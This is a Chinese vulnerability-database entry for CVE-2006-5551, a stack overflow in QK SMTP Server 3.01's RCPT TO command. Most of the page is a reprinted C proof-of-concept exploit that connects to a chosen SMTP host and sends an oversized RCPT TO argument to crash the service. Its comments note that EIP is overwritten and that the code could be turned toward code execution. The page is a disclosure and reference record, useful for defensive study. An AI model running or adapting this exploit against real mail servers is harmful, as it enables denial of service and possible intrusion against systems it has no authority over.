QK SMTP Server 用户命令参数缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111363 漏洞类型 缓冲区溢出
发布时间 2006-10-23 更新时间 2006-10-30
CVE编号 CVE-2006-5551 CNNVD-ID CNNVD-200610-450
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2625
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-450
|漏洞详情
QKSMTPServer是一套SMTP(简单邮件传输协议)服务器软件。QKSMTPServer在处理用户命令参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。QKSMTPServer在处理传送给"RCPTTO:"命令的参数时存在栈溢出漏洞,远程攻击者可以通过向服务器发送超长参数导致执行任意指令。
|漏洞EXP
/*
=============================================================
0-day RCPT TO DoS Exploit for QK SMTP version 3.01 and lower.
=============================================================
Exploit affects a format string error in the RCPT TO command
in which the program attempts to print out the string back
to the console screen of the application. (RCPT TO: %s)
This PoC code could possibly be re-written to allow buffer
overflow and execution of code. (I unfortanetly lack time at
the moment to continue any more reasarch and development)

EIP, EBP, ESI and EAX can be overwritten with buffer code
but the program formats it in Unicode. Results can be similar
to this:
Buffer = "A"
EIP = 00400040
EBP = 00400040
ESI = 00400040

QK SMTP 3.01 is available here:
http://www.qksoft.com/qk-smtp-server/download.html
and at various shareware download sites across the internet.
Google "FREE SMTP" and it should pop up quickly

This was quickly compiled in LCC-Win32 (Free C++ compiler and IDE)
- Greg Linares
Questions/Comments/Etc --> GLinares.code [at] gmail [dot] com
*/



#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[65000];
static char buff2[65000];
WSADATA wsaData;


struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int i;
char *hostname;
unsigned short port;

if (argc <= 1)
   {
	  printf("QK SMTP <= 3.01 DoS RCPT TO: Overflow\n");
	  printf("By: Greg Linares (glinares.code [at ] gmail [dot] com)\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");

      exit(0);
   }


hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("25");

if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }


   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
	  printf("%s",hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);


   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   /* wait for SMTP service welcome*/
   buf[bytes] = '\0';
   check = strstr(buf, "2");
   if (check == NULL)
   {
      printf("ERROR: NO  response from SMTP service\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   static char Exp1[65000];
   memset(Exp1, 0, 4096);
   char Exp[] = "RCPT TO: ";
   char tail[] = "@a.com>\r\n";
   char A[] = "A";
   memset(overflow, 0, 65000);
   memset(buff2, 0, 100);
   for (i=0; i<100; i++)
	{
	   strcat(buff2, "A");
	}

   char EHLO[] = "EHLO \r\n";
   char MF[] = "MAIL FROM: <HI@";
 	strcat(overflow, MF);
	strcat(overflow, buff2);
	strcat(overflow, tail);



   send(sockfd, EHLO, strlen(EHLO), 0);
	Sleep(500);
	send(sockfd, overflow, strlen(overflow),0);
	Sleep(1000);
	strcat(Exp1, Exp);
	for (i=0; i<4096; i++){
		strcat(Exp1, A);
	}
	strcat(Exp1, tail);
	printf("%s", Exp1);
	send(sockfd, Exp1, strlen(Exp1),0);
	Sleep(2000);
    printf("Overflow Packet Sent Successfully...\n");
	closesocket(sockfd);
   WSACleanup();
 }

// milw0rm.com [2006-10-23]
|参考资料

来源:VUPEN
名称:ADV-2006-4169
链接:http://www.frsirt.com/english/advisories/2006/4169
来源:BID
名称:20681
链接:http://www.securityfocus.com/bid/20681
来源:MILW0RM
名称:2625
链接:http://www.milw0rm.com/exploits/2625
来源:SECTRACK
名称:1017114
链接:http://securitytracker.com/id?1017114
来源:SECUNIA
名称:22563
链接:http://secunia.com/advisories/22563
来源:MILW0RM
名称:2625
链接:http://milw0rm.com/exploits/2625